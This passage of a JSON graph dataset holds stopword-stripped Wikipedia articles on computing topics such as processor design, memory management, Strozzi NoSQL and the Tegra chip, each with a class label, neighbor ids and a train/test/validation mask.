      7941,
      3854,
      7438,
      5911,
      10013,
      7462,
      9002,
      814,
      1841,
      3904,
      4417,
      4930,
      10051,
      10571,
      6477,
      7505,
      3413,
      10584,
      7517,
      10083,
      8037,
      4465,
      3960,
      10616,
      10618,
      3451,
      380,
      6536,
      393,
      3475,
      9622,
      11160,
      1952,
      8609,
      9126,
      936,
      5040,
      1459,
      1461,
      1462,
      10680,
      7612,
      9665,
      5059,
      4548,
      10703,
      5585,
      477,
      8680,
      10734,
      9714,
      499,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2621,
    "label": 1,
    "text": "Strozzi_NoSQL:strozzi nosql strozzi nosql shell-based relational database management system initialized developed carlo strozzi runs unix-like operating systems others compatibility layers e.g. cygwin windows file name nosql merely reflects fact express queries using structured query language nosql rdbms distinct circa-2009 general concept nosql databases typically non-relational unlike nosql rdbms strozzi nosql released gnu gpl nosql uses operator-stream paradigm number operators perform unique function passed data stream used supplied unix input/output redirection system pipe system result calculation passed operators unix pipes run memory efficient way implementation nosql development led carlo strozzi latest perhaps active line implementations stream-operator database design originally described evan shaffer rod manis robert jorgensen 1991 unix review article associated paper implementations include perl-based rdb commercial version original authors called /rdb starbase version added astronomical data operators john roll harvard smithsonian astrophysical observatory strengths dealing pipe data implementations mixture awk programming languages usually c perl concept originally described 1991 unix review article later expanded paper see reference well book unix relational database management nosql along similar stream-operator databases well-suited number fast analytical database tasks significant advantage keeping tables ascii text form allowing many powerful text processing tools used adjunct database functions popular tools use nosql include python perl awk shell scripts using ubiquitous unix text processing tools cut paste grep sort uniq etc nosql written mostly interpretive languages slowing actual process execution ability use ordinary pipes filesystems means extremely fast many applications using ram filesystems heavily leveraging pipes mostly memory-based many implementations reasons avoiding sql follows contrast rdbms nosql full power unix application development usage user interface uses unix shell necessary learn set new commands administer database view nosql database set files similar user file scripting type database language used besides unix shell shell-nature encourages casual use database makes use familiar resulting formal use words nosql set shell routines access normal files operating system retrieve information particular employee query sql might look like since document-oriented nosql database often retrieves pre-connected document representing entire employee query might look like stream-operator paradigm differs conventional sql since nosql db relational possible map nosql operators sql equivalents",
    "neighbors": [
      8582,
      6797,
      8499,
      5492,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 2622,
    "label": 3,
    "text": "Emerald_Isle_(video_game):emerald isle video game emerald isle text adventure game level 9 computing released 1984 plane crashed struck storm bermuda triangle sole occupant escaped parachute finds unknown island inhabited strange peoples creatures game standard text adventure limited graphics platforms",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2623,
    "label": 3,
    "text": "Processor_design:processor design processor design design engineering task creating processor key component computer hardware subfield computer engineering design development implementation electronics engineering fabrication design process involves choosing instruction set certain execution paradigm e.g vliw risc results microarchitecture might described e.g vhdl verilog microprocessor design description manufactured employing various semiconductor device fabrication processes resulting die bonded onto chip carrier chip carrier soldered onto inserted socket printed circuit board pcb mode operation processor execution lists instructions instructions typically include compute manipulate data values using registers change retrieve values read/write memory perform relational tests data values control program flow cpu design divided design following components cpus designed high-performance markets might require custom optimized application specific see designs items achieve frequency power-dissipation chip-area goals whereas cpus designed lower performance markets might lessen implementation burden acquiring items purchasing intellectual property control logic implementation techniques logic synthesis using cad tools used implement datapaths register files clocks common logic styles used cpu design include unstructured random logic finite-state machines microprogramming common 1965 1985 programmable logic arrays common 1980s longer common device types used implement logic include cpu design project generally major tasks re-designing cpu core smaller die-area helps shrink everything photomask shrink resulting number transistors smaller die improves performance smaller transistors switch faster reduces power smaller wires less parasitic capacitance reduces cost cpus fit wafer silicon releasing cpu size die smaller cpu core keeps cost allows higher levels integration within one very-large-scale integration chip additional cache multiple cpus components improving performance reducing overall system cost complex electronic designs logic verification effort proving design bugs dominates project schedule cpu key cpu architectural innovations include index register cache virtual memory instruction pipelining superscalar cisc risc virtual machine emulators microprogram stack variety proposed including reconfigurable logic clockless cpus computational ram optical computing benchmarking way testing cpu speed examples include specint specfp developed standard performance evaluation corporation consumermark developed embedded microprocessor benchmark consortium eembc commonly used metrics include may tradeoffs optimizing metrics particular many design techniques make cpu run faster make performance per watt performance per dollar deterministic response much worse vice versa several different markets cpus used since markets differ requirements cpus devices designed one market cases inappropriate markets vast majority revenues generated cpu sales general purpose computing desktop laptop server computers commonly used businesses homes market intel ia-32 64-bit version x86-64 architecture dominate market rivals powerpc sparc maintaining much smaller customer bases yearly hundreds millions ia-32 architecture cpus used market growing percentage processors mobile implementations netbooks laptops since devices used run countless different types programs cpu designs specifically targeted one type application one function demands able run wide range programs efficiently made cpu designs among advanced technically along disadvantages relatively costly high power consumption 1984 high-performance cpus required four five years develop scientific computing much smaller niche market revenue units shipped used government research labs universities 1990 cpu design often done market mass market cpus organized large clusters proven affordable main remaining area active hardware design research scientific computing high-speed data transmission systems connect mass market cpus measured units shipped cpus embedded machinery telephones clocks appliances vehicles infrastructure embedded processors sell volume many billions units per year however mostly much lower price points general purpose processors single-function devices differ familiar general-purpose cpus several ways embedded cpu family largest number total units shipped 8051 averaging nearly billion units per year 8051 widely used inexpensive design time roughly zero widely available commercial intellectual property often embedded small part larger system chip silicon cost 8051 low us 0.001 implementations use 2,200 logic gates take 0.0127 square millimeters silicon 2009 cpus produced using arm architecture instruction set 32-bit instruction set arm architecture first arm chip designed one half years 5 human years work time 32-bit parallax propeller microcontroller architecture first chip designed two people 10 human years work time 8-bit avr architecture first avr microcontroller conceived designed two students norwegian institute technology 8-bit 6502 architecture first mos technology 6502 chip designed 13 months group 9 people 32 bit berkeley risc risc ii architecture first chips mostly designed series students part four quarter sequence graduate courses design became basis commercial sparc processor design decade every student taking 6.004 class mit part team—each team one semester design build simple 8 bit cpu 7400 series integrated circuits one team 4 students designed built simple 32 bit cpu semester undergraduate courses require team 2 5 students design implement test simple cpu fpga single 15-week semester multititan cpu designed 2.5 man years effort considered relatively little design effort time 24 people contributed 3.5 year multititan research project included designing building prototype cpu embedded systems highest performance levels often needed desired due power consumption requirements allows use processors totally implemented logic synthesis techniques synthesized processors implemented much shorter amount time giving quicker time-to-market",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      8727,
      10779,
      10781,
      6181,
      8229,
      8231,
      10285,
      3630,
      4144,
      6705,
      7218,
      11314,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8808,
      8815,
      7281,
      630,
      8822,
      6268,
      3197,
      7313,
      9366,
      3226,
      6815,
      8352,
      5793,
      6818,
      6821,
      682,
      7852,
      9391,
      2224,
      2226,
      3762,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      2273,
      10469,
      7911,
      10985,
      1770,
      5355,
      1260,
      5356,
      5358,
      9964,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      5380,
      1798,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      799,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      11125,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      5529,
      10658,
      9126,
      10153,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      4036,
      453,
      3014,
      6596,
      1480,
      9677,
      466,
      9172,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 2624,
    "label": 1,
    "text": "SilverPlatter:silverplatter silverplatter information inc. one first companies produce commercial reference databases cd-roms founded 1983 united kingdom béla hatvany walt winshall explicit intention using cd technology publish data thus provide alternative searching databases magnetic tape format ron rietdyk company first president firm started 1986 small building newton lower falls massachusetts company began experimenting four databases eric lisa psyclit embase 1987 company 12 databases revenues approximately 6m competing cd plus ovid technologies aries cambridge scientific abstracts dialog company offered libraries wide range cd-roms next years company expanded academic base medical business health safety cd publishing 1989 firm launched multiplatter system networking cd-roms across local area network 1991 introduced searching data held company site erl electronic reference library system providing hard disk access databases via dxp protocol last proved successful 500 sites using firm technology 1997 year company grown 75m revenues 250 databases 2001 silverplatter sold wolters kluwer reputed price 113m forms part ovid technologies wolters kluwer subsidiary",
    "neighbors": [
      4726
    ],
    "mask": "None"
  },
  {
    "node_id": 2625,
    "label": 2,
    "text": "Memory_management_(operating_systems):memory management operating systems operating systems memory management function responsible managing computer primary memory memory management function keeps track status memory location either allocated free determines memory allocated among competing processes deciding gets memory receive much allowed memory allocated determines memory locations assigned tracks memory freed unallocated updates status distinct application memory management process manages memory assigned operating system single allocation simplest memory management technique computer memory usually exception small portion reserved operating system available single application ms-dos example system allocates memory way embedded system running single application might also use technique system using single contiguous allocation may still multitask swapping contents memory switch among users early versions music operating system used technique partitioned allocation divides primary memory multiple memory partitions usually contiguous areas memory partition might contain information specific job task memory management consists allocating partition job starts unallocating job ends partitioned allocation usually requires hardware support prevent jobs interfering one another operating system ibm system/360 used lock-and-key technique systems used base bounds registers contained limits partition flagged invalid accesses univac 1108 storage limits register separate base/bound sets instructions data system took advantage memory interleaving place called bank bank separate memory modules partitions may either static defined initial program load ipl boot time computer operator dynamic automatically created specific job ibm system/360 operating system multiprogramming fixed number tasks mft example static partitioning multiprogramming variable number tasks mvt example dynamic mvt successors use term region distinguish dynamic partitions static ones systems partitions may relocatable using hardware typed memory like burroughs corporation b5500 base bounds registers like pdp-10 ge-635 relocatable partitions able compacted provide larger chunks contiguous physical memory compaction moves in-use areas memory eliminate holes unused areas memory caused process termination order create larger contiguous free areas systems allow partitions swapped secondary storage free additional memory early versions ibm time sharing option tso swapped users single time-sharing partition paged allocation divides computer primary memory fixed-size units called page frames program virtual address space pages size hardware memory management unit maps pages frames physical memory allocated page basis address space appears contiguous usually paged memory management job runs address space however single address space operating systems run processes within single address space ibm runs processes within large address space ibm os/vs2 svs ran jobs single 16mib virtual address space paged memory demand-paged system move pages required primary secondary memory segmented memory memory management technique provide user program linear contiguous address space segments areas memory usually correspond logical grouping information code procedure data array segments require hardware support form segment table usually contains physical address segment memory size data access protection bits status swapped swapped etc segmentation allows better access protection schemes memory references relative specific segment hardware permit application reference memory defined segment possible implement segmentation without paging without paging support segment physical unit swapped memory required paging support pages usually unit swapping segmentation adds additional level security addresses segmented system usually consist segment id offset relative segment base address defined offset zero intel ia-32 x86 architecture allows process 16,383 segments 4gib ia-32 segments subdivisions computer linear address space virtual address space provided paging hardware multics operating system probably best known system implementing segmented memory multics segments subdivisions computer physical memory 256 pages page 1k 36-bit words size resulting maximum segment size 1mib 9-bit bytes used multics process could 4046 segments rollout/rollin computer operating system memory management technique entire non-shared code data running program swapped auxiliary memory disk drum free main storage another task programs may rolled demand end or…when waiting long event rollout/rollin commonly used time-sharing systems user think time relatively long compared time swap unlike virtual storage—paging segmentation rollout/rollin require special memory management hardware however unless system relocation hardware memory map base bounds registers program must rolled back original memory locations rollout/rollin largely superseded virtual memory rollout/rollin optional feature os/360 multiprogramming variable number tasks mvt rollout/rollin allows temporary dynamic expansion particular job beyond originally specified region job needs space rollout/rollin attempts obtain unassigned storage job use unassigned storage another job rolled -- i.e. transferred auxiliary storage -- region may used first job released first job additional storage available either 1 unassigned storage source 2 receive job transferred back main storage rolled note rollin/rollout os/360 used batch jobs rollin occur jobstep borrowing region terminates",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      541,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      6730,
      6221,
      86,
      10333,
      97,
      2152,
      8298,
      6772,
      7285,
      9335,
      2168,
      634,
      1147,
      3197,
      1150,
      2179,
      10883,
      4747,
      6797,
      9366,
      6296,
      7325,
      9887,
      1702,
      6314,
      3248,
      6837,
      1219,
      8388,
      1736,
      2250,
      9932,
      5840,
      6868,
      7382,
      8410,
      1247,
      1253,
      7403,
      5363,
      2811,
      2304,
      10499,
      5380,
      1801,
      1804,
      273,
      9490,
      11539,
      8474,
      3871,
      10016,
      2345,
      814,
      7983,
      10543,
      823,
      10040,
      4409,
      7483,
      6974,
      11075,
      4423,
      4424,
      5457,
      11601,
      10590,
      8545,
      868,
      8551,
      5492,
      8573,
      7039,
      394,
      3978,
      7053,
      5008,
      7057,
      11153,
      11667,
      8092,
      1954,
      7076,
      421,
      11184,
      3512,
      5562,
      6075,
      6078,
      9151,
      1474,
      8136,
      9166,
      5074,
      5080,
      5598,
      10731,
      6128,
      5619,
      10235
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2626,
    "label": 9,
    "text": "Galaksija_BASIC:galaksija basic galaksija basic basic interpreter galaksija build-it-yourself home computer yugoslavia partially based code taken trs-80 level 1 basic creator believed microsoft basic extensive modifications galaksija basic—such include rudimentary array support video generation code cpu absence dedicated video circuitry generally improvements programming language—is said left much flow-control floating point code remaining original core implementation interpreter fully contained 4 kib rom 1 computer original mainboard reserved slot extension rom b 2 added commands features built-in zilog z80 assembler core implementation rom 1 contained 3 special symbols 32 keywords extended basic features rom b 2 contained one extra reserved symbol 22 extra keywords",
    "neighbors": [
      9714,
      477,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 2627,
    "label": 2,
    "text": "Data_segment:data segment computing data segment often denoted .data portion object file corresponding virtual address space program contains initialized static variables global variables static local variables size segment determined size values program source code change run time data segment read-write since values variables altered run time contrast read-only data segment segment .rodata contains static constants rather variables also contrasts code segment also known text segment read-only many architectures zero-initialized data variables constants instead bss segment historically able support memory address spaces larger native size internal address register would allow early cpus implemented system segmentation whereby would store small set indexes use offsets certain areas intel 8086 family cpus provided four segments code segment data segment stack segment extra segment segment placed specific location memory software executed instructions operated data within segments performed relative start segment allowed 16-bit address register would normally able access 64 kb memory space access 1 mb memory space segmenting memory space discrete blocks specific tasks carried programming languages day concept still widely use within modern programming languages computer program memory largely categorized two sections read-only read-write distinction grew early systems holding main program read-only memory mask rom prom eeprom systems became complex programs loaded media ram instead executing rom idea portions program memory modified retained became .text .rodata segments program remainder could written divided number segments specific tasks code segment also known text segment simply text portion object file corresponding section program virtual address space contains executable instructions stored generally read-only fixed size .data segment contains global static variables pre-defined value modified variables defined within function thus accessed anywhere defined function defined static retain address across subsequent calls examples c include values variables initially stored within read-only memory typically within .text copied .data segment start-up routine program note example variables declared within function would default stored local stack frame bss segment also known uninitialized data usually adjacent data segment bss segment contains global variables static variables initialized zero explicit initialization source code instance variable defined codice_1 would contained bss segment heap area commonly begins end .bss .data segments grows larger addresses heap area managed malloc calloc realloc free may use brk sbrk system calls adjust size note use brk/sbrk single heap area required fulfill contract malloc/calloc/realloc/free may also implemented using mmap/munmap reserve/unreserve potentially non-contiguous regions virtual memory process virtual address space heap area shared threads shared libraries dynamically loaded modules process stack area contains program stack lifo structure typically located higher parts memory stack pointer register tracks top stack adjusted time value pushed onto stack set values pushed one function call termed stack frame stack frame consists minimum return address automatic variables also allocated stack stack area traditionally adjoined heap area grew towards stack pointer met heap pointer free memory exhausted large address spaces virtual memory techniques tend placed freely still typically grow converging direction standard pc x86 architecture stack grows toward address zero meaning recent items deeper call chain numerically lower addresses closer heap architectures grows opposite direction interpreted languages offer similar facility data segment notably perl ruby languages including line codice_2 perl codice_3 ruby old perl marks end code segment start data segment contents prior line executed contents source file line available file object codice_4 perl e.g. codice_5 codice_6 ruby considered form document file literal",
    "neighbors": [
      1152,
      1922,
      8582,
      6664,
      6921,
      11411,
      9245,
      6829,
      5040,
      3386,
      6078,
      5059,
      6087,
      4424,
      8531,
      6868,
      10333,
      8545,
      7933
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2628,
    "label": 4,
    "text": "CSC_Version_6.0:csc version 6.0 center internet security critical security controls version 6.0 released october 15 2015 consists",
    "neighbors": [
      9049,
      3994,
      2628
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2629,
    "label": 4,
    "text": "Parisa_Tabriz:parisa tabriz parisa tabriz american computer security expert works google director engineering chose title security princess due experience hacking internet security desire less staid whimsical title business card 2012 forbes magazine included top 30 people 30 watch technology industry list tabriz appears protagonist intrepid innovator book ara star engineer komal singh parisa tabriz born iranian father doctor american mother nurse polish-american descent grew suburbs chicago older sister two brothers neither parents computer literate tabriz n't encounter world computing first year university tabriz initially enrolled university illinois urbana–champaign study engineering soon became interested computer science instead completed bachelor master degrees university research wireless networking security attacks privacy-enhancing technologies co-authoring papers advisor nikita borisov also active member student club interested website security joined website hacked introduced field internet security tabriz offered summer internship google security team college joined company months graduation 2007 preparing attend conference tokyo google decided use job title security princess business card rather conventional information security engineer since sounded less boring considered ironic career tabriz trained google staff interested learning security worked youth expose diverse set people field computer security 2013 tabriz took responsibility security google chrome 2018 response rsa conference one non-male keynote speaker line-up 20 tabriz co-founded security advocates conference oursa five days pulled together speaker line-up consisting speakers under-represented backgrounds 14 speakers women",
    "neighbors": [
      8671,
      7899,
      2558,
      679
    ],
    "mask": "Test"
  },
  {
    "node_id": 2630,
    "label": 4,
    "text": "Lock_screen:lock screen lock screen computer user interface element used various operating systems regulate immediate access device requiring user perform certain action order receive access entering password using certain button combination performing certain gesture using device touchscreen lock functions pc operating systems utilize login screen lock screens mobile devices often provide functionality beyond unlocking phone notifications emails text messages date time display shortcuts certain applications mobile operating system run smartphones tablets typically use gesture based lock-screen phones manufactured neonode unlocked swiping right touchscreen apple ios used iphone ipad lines utilized similar unlock mechanism ios 10 on-screen slider slid right beginning ios 5 sliding direction sends user directly camera app ios 7 slider widget removed part larger overhaul ios interface users could swipe point screen lock screen also displays clock notifications provides audio playback controls ios 10 made major changes lock screen removing swiping gesture accessing home screen requiring touch home button swiping still used access camera well additional page left widgets iphone x uses swipe gesture access home screen authenticated physical home button first android use gesture-based lock screen electing require user press phone menu button android 2.0 new gesture-based lock screen introduced displaying two icons one unlocking phone one setting volume mode activated dragging relevant icon center screen curve similarly rotary dial android 2.1 rotary dial replaced two tabs either end screen android 3.0 introduced new design ball padlock icon dragged outside circular area 4.0 option unlock straight camera provided 4.1 adds ability unlock google search screen dragging android 4.2 makes additional changes lock screen allowing users add widgets pages accessible lock screen swiping left edge screen camera accessed similar manner swiping right edge screen android also allows devices locked using password passcode pattern grid 9 circles fingerprint sensing facial recognition android distributions manufacturers typically use different lock screen designs stock android utilizes newer versions htc sense used metallic ring dragged bottom screen unlock phone also allows users launch apps dragging respective shortcut icon ring instead recent samsung devices lock screen involves dragging direction location screen touchwiz nature devices galaxy iii s4 also accompanied visual effect pond ripple lens flare similarly htc lock screen app shortcuts dragged bottom screen unlock directly apps may contain adware hijacks default lock screen replace one displays advertising november 2017 google play store officially banned non-lock screen apps monetizing lock screen windows nt offered ability users lock computers displaying login window requires active user password entered re-gain access system since windows xp lock function also bound keyboard shortcut windows 8 lock screen re-designed closer resemble used mobile operating systems users choose distinct wallpaper use lock screen also displays clock calendar events notifications apps screen dragged upwards mouse touchscreen unlock device windows 10 maintains design whilst adding ability use cortana voice assistant lock screen support slide shows windows spotlight service retrieve daily wallpapers optionally receive promotional suggestions related wallpaper screen locking functionality also built screensaver systems unix-like operating systems xscreensaver gnome-screensaver apple holds several patents related sliding lock screen used ios devices granted 2010 2011 describing system involves continuously dragging image certain point unlock device part ongoing patent wars numerous companies surrounding patents related mobile devices apple asserted patents several patent infringement lawsuits outside united states competing vendors apple lawsuits samsung netherlands htc united kingdom led failure courts ruled patents invalid citing similar lock screen n1 mobile phone manufactured swedish company neonode prior art apple design british court specifically ruled apple lock screen obvious improvement neonode n1 due additional visual feedback on-screen slider graphic unlike n1 displayed written instruction explaining gesture early work touchscreen technology university maryland human – computer interaction lab also cited prior art particular 1991 touchscreen slider developed catherine plaisant january 2012 apple permanent injunction german court ruled motorola mobility violated patents recent devices although motorola xoom tablet ruled infringed patent however apple warned would required put bond insurance allow injunction take effect potential sales ban result would limited germany",
    "neighbors": [
      10755,
      5892,
      9732,
      9610,
      6539,
      8333,
      4624,
      8976,
      5397,
      10009,
      2852,
      7595,
      7983,
      2737,
      1083,
      4032,
      3409,
      2259,
      8019,
      1623,
      4458,
      8299,
      877,
      6644,
      6783
    ],
    "mask": "None"
  },
  {
    "node_id": 2631,
    "label": 1,
    "text": "Dapper_ORM:dapper orm dapper object-relational mapping orm product microsoft .net platform provides framework mapping object-oriented domain model traditional relational database purpose relieve developer significant portion relational data persistence-related programming tasks dapper free open source software distributed dual license either apache license 2.0 mit license following key features dapper",
    "neighbors": [
      2401,
      9286,
      3080,
      5612,
      7983,
      3763,
      3573,
      632,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 2632,
    "label": 1,
    "text": "AutoNumber:autonumber autonumber type data used microsoft access tables generate automatically incremented numeric counter may used create identity column uniquely identifies record table one autonumber allowed table data type called counter access 2.0 three forms autonumbers generated default size autonumber 4-byte long integer size used start+increment random autonumbers replication id autonumbers codice_1 property field changed long integer codice_2 autonumber long integer codice_3 property determines whether start+increment random form values property take increment random default autonumber type start+increment counter start value 1 increment 1 although many instances autonumber field appear contains row count deletion rows table example cause autonumber fields re-numbered instead leaves holes numbering similarly transaction add row table begun later aborted autonumber assigned row re-used default start+increment form start value 1 increment 1 suitable circumstances reasons choose form trade-offs default start increment values might reveal information table desired reveal people viewing individual table rows example using autonumber field customer id might reveal information desirable reveal say customer number 6 one example occasion start value autonumber field raised customer number 6 say autonumber field value 10006 using random values desirable cases would unfortunate possible guess next values assigned new rows table usage rare however common problem autonumber fields encountered tables replicated multiple users using multiple replicas table likely end assigning values autonumber fields new rows add causing replication conflicts replicas merged problem addressed two ways first possible use replication ids autonumbers replication ids guids unique across replicas low probability collision second access creates table replicas automatically changes autonumbers start+increment form random form following data definition language ddl query creates autonumber field start value increment query resets counter alternative method resetting counter drop column re-add side effect renumbering existing rows table",
    "neighbors": [
      10632,
      8201,
      11144,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      10145,
      9634,
      8230,
      4263,
      2344,
      7080,
      10029,
      10286,
      9397,
      440,
      3004,
      10048,
      5953,
      9286,
      460,
      2901,
      10326,
      987,
      2780,
      4065,
      7523,
      9828,
      10471,
      6124,
      2669,
      6383,
      1904,
      2544,
      9328,
      5619,
      9075,
      10737,
      1146,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 2633,
    "label": 3,
    "text": "Mystery_House:mystery house mystery house adventure game released on-line systems 1980 designed written illustrated roberta williams programmed ken williams apple ii mystery house first graphical adventure game first game produced on-line systems company would evolve sierra on-line one earliest horror video games game starts near abandoned victorian mansion player soon locked inside house option explore mansion contains many interesting rooms seven people tom plumber sam mechanic sally seamstress dr. green surgeon joe grave-digger bill butcher daisy cook initially player search house order find hidden cache jewels however terrible events start happening dead bodies people begin appearing becomes obvious murderer loose house player must discover become next victim end 1970s ken williams sought set company enterprise software market-dominating apple ii computer one day took teletype terminal house work development accounting program looking catalogue found game called colossal cave adventure buying game introduced wife roberta played finished colossal cave adventure began search something similar found market underdeveloped roberta decided could write conceived plot mystery house taking inspiration agatha christie novel none recognizing knew programming needed someone else code game convinced husband help ken agreed borrowed brother apple ii computer write game roberta suggested adding graphical scenes otherwise text-based game would make interesting players pair bought versawriter machine allowed users trace line drawing convert digital drawing roberta drew seventy scenes game ken found however resulting digital drawings large fit 5¼-inch floppy disk stored images game instructions program redraw lines scenes rather static images well writing better version versawriter scanning software resulting game text-based adventure depiction character location displayed text game code completed days finished may 5 1980 pair took advertisement micro magazine on-line systems mass-produced ziploc bags containing floppy disk sheet instructions sold 24.95 williams surprise roberta initially considered hobby project sold 10,000 copies mail-order including 1982 rerelease sierraventure line game sold 80,000 units world-wide making one best-selling computer games time computer gaming world 1996 ranked fourth magazine list innovative computer games gamepro named mystery house 51st important game time 2007 introducing visual component adventure games featuring graphics time computer games though game often considered first adventure game use graphics dungeon crawl role-playing video games already using graphics prior release applying graphics adventure game however unprecedented previous story-based adventure games entirely text-based mystery house success led williams create hi-res adventures brand note game hi-res adventure 1 follow-on success next game wizard princess pair moved game development full-time on-line systems incorporated 1980 sierra on-line game later released public domain 1987 part sierra seventh anniversary celebration japan several different adventure games title mystery house released 1982 microcabin released mystery house unrelated inspired on-line systems game name following year japanese company starcraft released enhanced remake on-line systems mystery house realistic art work depiction blood nec pc-6001 pc-8801 mystery house ii msx released sequel microcabin mystery house japanese versions mystery house sold 50,000 units including 30,000 copies msx 20,000 copies pc-6001 pc-8001 pc-8801 pc-9801 fm-7 x1 computers mystery house satirized 1982 adventure game prisoner 2 one location game spooky house whereupon arrival player told killed ken —that ken williams—and must seek absolution murder elements game later reintroduced sierra on-line game colonel bequest 1989",
    "neighbors": [
      5184,
      6404,
      6405,
      9006,
      7023
    ],
    "mask": "Test"
  },
  {
    "node_id": 2634,
    "label": 4,
    "text": "Morgan_Marquis-Boire:morgan marquis-boire morgan marquis-boire new zealand-born hacker journalist security researcher late 2017 accused multiple sexual assaults director security first look media contributing writer intercept research security surveillance censorship front pages new york times washington post covered news media including bbc news bloomberg wall street journal der spiegel work tracking digital component ongoing syrian civil war book black code inside battle cyberspace marquis-boire previously served advisor freedom press foundation special advisor electronic frontier foundation eff advisor united nations interregional crime justice research institute marquis-boire resigned september 2017 position technical advisory group citizen lab multi-disciplinary advanced research laboratory university toronto citizen lab later disclosed resignation received allegation 2014 sexual assault involving marquis-boire profiled wired cnn süddeutsche zeitung tages anzeiger one wired italy top 50 people 2014 march 2015 named young global leader marquis-boire born new zealand began hacking teenager name headhntr holds bachelor degree political science university auckland marquis-boire conducted research blue coat systems palo alto company provides internet blocking monitoring solutions reports include devices wander mistake planet blue coat redux 2013 planet blue coat mapping global censorship surveillance tools 2013 research covered news media including front page washington post new york times globe mail jakarta post following publication reports blue coat systems announced would longer provide “ support updates services ” software syria april 2013 us government bureau industry security imposed fine usd 2.8 million emirati company responsible purchasing filtering products blue coat exporting syria without license marquis-boire conducted research global proliferation targeted surveillance software toolkits including finfisher hacking team finfisher suite remote intrusion surveillance software developed munich-based gamma international gmbh marketed sold exclusively law enforcement intelligence agencies uk-based gamma group 2012 morgan marquis-boire bill marczak provided first public identification finfisher software marquis-boire collaborators done investigations finfisher including revealing use bahraini activists analyzing variants finfisher suite target mobile phone operating systems uncovering targeted spying campaigns political dissidents malaysia ethiopia documenting finfisher command control servers 36 countries research informed responses civil society organizations pakistan mexico united kingdom mexico local activists politicians collaborated demand investigation state ’ acquisition surveillance technologies uk led crackdown sale software worries misuse repressive regimes hacking team milan italy-based company provides intrusion surveillance software called remote control system rcs law enforcement intelligence agencies marquis-boire collaborators mapped rcs network endpoints 21 countries provided evidence rcs used target human rights activist united arab emirates moroccan media organization independent news agency run members ethiopian diaspora following publication reports eff privacy international took legal action related allegations ethiopian government compromised computers ethiopian expatriates us uk 23rd usenix security symposium marquis-boire researchers released paper governments hack opponents look actors technology examining government targeting activists opposition members ngos observed bahrain syria united arab emirates 2012 2017 marquis-boire reported digital campaigns targeting syrian activists eff citizen lab many findings translated arabic disseminated along recommendations detecting removing malware work cover businessweek covered new york times al jazeera wired december 31 2013 marquis-boire gave interview covering work npr radio show things considered 2012 gave presentation use targeted malware attacks arab spring black hat briefings las vegas covered use malware campaigns purposes digital surveillance espionage libya syria bahrain morocco iran released paper eva galperin eff targeting vietnamese diaspora malware attacks detailed ongoing state-sponsored hacking campaign targeting prominent bloggers academics journalists marquis-boire given interviews wake global surveillance disclosures die zeit international business times dazed named al jazeera media trends watch 2015 shane huntley marquis-boire co-authored paper government targeting journalists media organizations presented black hat singapore 2014 paper reported 21 world top 25 media organizations targeted state-sponsored hacking april 2015 marquis-boire spoke western regional conference society professional journalists san francisco california presented paper entitled data security beginners black hat usa 2015 held las vegas august marquis-boire presented paper entitled big game hunting peculiarities nation-state malware research marquis-boire presented paper entitled security humans privacy coercion resistant design strange loop conference st. louis missouri september 2015 may 2016 state surveillance episode hbo series vice along edward snowden ron wyden september 2017 marquis-boire resigned position senior researcher citizen lab october organization cut ties informed accused sexually assaulting individual 2014 cyber dialogue event eff also released statement saying marquis-boire longer associated november verge published report specific claims assault rape second article contained claims including alleged quotes chat extracts marquis-boire admits drunkenly sexually assaulted raped women — exact number currently determining number women quoted articled sexually assaulted raped least ten",
    "neighbors": [
      3520,
      5024,
      2275,
      4903,
      3495,
      9227,
      8172,
      5135,
      7893,
      4314,
      7515,
      4956,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 2635,
    "label": 3,
    "text": "Tegra:tegra tegra system chip soc series developed nvidia mobile devices smartphones personal digital assistants mobile internet devices tegra integrates arm architecture central processing unit cpu graphics processing unit gpu northbridge southbridge memory controller onto one package early tegra socs designed efficient multimedia processors recent models emphasize performance gaming machine learning applications without sacrificing power efficiency tegra apx 2500 announced february 12 2008 tegra 6xx product line revealed june 2 2008 apx 2600 announced february 2009 apx chips designed smartphones tegra 600 650 chips intended smartbooks mobile internet devices mid first product use tegra microsoft zune hd media player september 2009 followed samsung m1 microsoft kin first cellular phone use tegra however phone app store tegra power provide much advantage september 2008 nvidia opera software announced would produce version opera 9.5 browser optimised tegra windows mobile windows ce mobile world congress 2009 nvidia introduced port google android tegra january 7 2010 nvidia officially announced demonstrated next generation tegra system-on-a-chip nvidia tegra 250 consumer electronics show 2010 nvidia primarily supports android tegra 2 booting arm-supporting operating systems possible devices bootloader accessible tegra 2 support ubuntu gnu/linux distribution also announced nvidia developer forum nvidia announced first quad-core soc february 2011 mobile world congress event barcelona though chip codenamed kal-el branded tegra 3 early benchmark results show impressive gains tegra 2 chip used many tablets released second half 2011 january 2012 nvidia announced audi selected tegra 3 processor in-vehicle infotainment systems digital instruments display processor integrated audi entire line vehicles worldwide beginning 2013 process iso 26262-certified summer 2012 tesla motors began shipping model electric high performance sedan contains two nvidia tegra 3d visual computing modules vcm one 